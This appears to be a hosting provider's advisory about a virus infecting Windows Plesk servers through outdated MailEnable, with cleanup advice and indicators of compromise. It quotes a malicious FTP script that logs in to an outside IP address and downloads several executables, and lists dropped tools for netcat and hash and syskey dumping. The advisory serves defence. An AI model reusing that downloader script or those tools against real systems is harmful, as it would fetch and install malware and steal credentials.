There is currently a virus affecting Windows Plesk servers online. The point of infection seems to be Mailenable, and SWSoft is aware of it, and has confirmed that it is a known issue not limited to PowerVPS.

At this time, there is no known solution, but SWSoft is working on it. We do not yet have a solution, but if your VPS is infected we can rebuild it for you to remove the virus. We recommend backing up all of your data asap if you are on an MSVS or Virtuozzo for Windows VPS running Plesk and Mailenable.

At this time, we're recommending that anyone with Plesk for Windows DISABLE MAILENABLE until further notice.

Here is what we believe happened here (we have not heard anything from SWSoft officially yet).

Any server using MailEnable 1.95 or lower is potentially at risk.

If you happen to experience anything strange with your box, yet you are still able to RDP in, make sure to disable MailEnable SMTP Relay Service. Once you disable it, you should be able to get rdriv.sys cleaned up. This particular service is not part of MailEnable and while it's running you will not be able to remove rdriv.sys. You may also want to search for following binaries:

C:\windows\system32\a.exe
C:\windows\system32\bot.exe
C:\windows\system32\bw.exe
C:\windows\system32\gethashes.exe
C:\windows\system32\getsyskey.exe
C:\windows\system32\nc.exe
C:\windows\system32\rdriv.sys
C:\windows\system32\start.bat

You may also come across C:\windows\system32\script1.txt which contains:

open 80.34.174.156 21
user anonymous
anonymous@on.the.net
lcd c:\windows\system32
get explorer.exe
get runservice_bis.dll
get kill.exe
get fport.exe
get hyberport.exe
get JASFV.INI
bye

Again - if you have a Windows 2003 Server machine (dedicated/VPS), and are using MailEnable which is not up to date, get a copy of the latest versions at http://mailenable.com/download.asp and apply them ASAP. Then go through the box and verify the above.